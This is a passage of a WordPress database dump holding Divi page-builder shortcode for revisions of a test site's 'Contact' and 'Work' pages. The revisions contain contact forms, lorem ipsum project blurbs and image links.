_builder_version=\"3.0.78\"][/et_pb_map_pin][/et_pb_fullwidth_map][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_direction=\"bottom\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Get in touch.</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','CONTACT','','inherit','closed','closed','','401-revision-v1','','','2020-08-07 20:58:32','2020-08-07 20:58:32','',401,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/401-revision-v1/',0,'revision','',0),(650,1,'2020-08-07 20:59:51','2020-08-07 20:59:51','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"|||\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Our work</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off%22\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Projects Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 01\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]01\r[/et_pb_text][et_pb_cta title=\"ABC - Corporate Branding\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 02\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]02\r[/et_pb_text][et_pb_cta title=\"Enkuber - App Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 03\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]03\r[/et_pb_text][et_pb_cta title=\"Iqra - Business Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 04\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]04\r[/et_pb_text][et_pb_cta title=\"Ninza - Branding Identity\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Work','','inherit','closed','closed','','396-revision-v1','','','2020-08-07 20:59:51','2020-08-07 20:59:51','',396,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/396-revision-v1/',0,'revision','',0),(652,1,'2020-08-07 21:00:50','2020-08-07 21:00:50','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"|||\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Our work</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off%22\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Projects Section\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"50px||50px||false|false\" hover_enabled=\"0\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 01\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]01\r[/et_pb_text][et_pb_cta title=\"ABC - Corporate Branding\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" 